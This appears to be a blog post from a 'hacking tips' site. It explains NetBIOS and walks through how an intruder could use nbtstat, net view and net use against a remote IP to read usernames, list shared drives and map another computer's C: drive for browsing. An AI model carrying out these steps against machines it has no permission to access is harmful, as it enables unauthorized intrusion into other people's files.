-->

useful-article.blogspot.com


Welcome to useful-article.blogspot.com, a blog on Computer tips and tricks. I will update new and latest Computer tips here. All Hacking Tips will also be posted.Beware, this site does not contain any virus or malware, all tips are safe and hacking here is only intended for hacking your own computer for speed and more advanced functionality. All the Computer tips will be helpful for beginners as well as advanced.

-: NetBIOS Hacking :-

-: NetBIOS Hacking :-


NetBIOS stands for "Network Basic Input Output System".
It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources.
By default it runs on port 139.
NetBIOS gives the various information of the computers on a network, which includes computer name, username, domain, group, and many others.....!

The NBTSTAT Command :-
NBTSTAT is the command for manually interact with NetBIOS Over TCP/IP.
All the attributes (switches) used with nbtstat command and their usage can be viewed.
At the command prompt type-
C:\Windows>nbtstat



Sample NBTSTAT Response :-
C:\>nbtstat -A 117.200.160.174

NetBIOS Remote Machine Name Table
Name Type Status
----------------------------------------------
PRASANNA UNIQUE Registered
INSECURE LABS GROUP Registered
PRASANNA UNIQUE Registered
PRASANNA UNIQUE Registered
INSECURE LABS GROUP Registered

MAC Address = 86-95-55-50-00-00

An intruder could use the output from an nbtstat against your machines to begin gathering information about them.

" in above table is nothing but the username of that system."

The next step for an intruder would be to try and list the open shares on the given computer, using the net view command.
Here is an example of the Net View command-
C:\>net view \\117.200.160.174
Shared resources at \\117.200.160.174
Sharename Type Comment
----------------------------------------
C Disk Drive C:\
MySofts Disk My Softwares Collection
E Disk Drive E:\

The command was completed successfully.


This information would give the intruder a list of shares which he would then use in conjunction with the Net Use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive, which he could then browse...!
C:\>net use G: \\117.200.160.174\C
The command was completed successfully.

C:\>G:

G:\>

Related Post

  • How to hack Windows XP Admin PasswordHow to hack Windows XP Admin Password If you log into a limited account on your target machine and open up a dos prompt…
  • Network HackingNetwork Hacking Network Hacking is generally means gathering information about domain by using tools like Telnet, Nsloo…
  • Hack Youtube To Watch the Best Quality VideosHack Youtube To Watch the Best Quality Videos Whenever you connect to my youtube channel (http://www.youtube.com/), if…
  • Latest Airtel HackNow a days Airtel gives New option to the Subscriber to access Mobile Office daily @ Rs.25.00/- per day. But this is too…
  • -: NetBIOS Hacking :--: NetBIOS Hacking :- NetBIOS stands for "Network Basic Input Output System". It was originally developed by IBM and …
0 Komentar untuk "-: NetBIOS Hacking :-"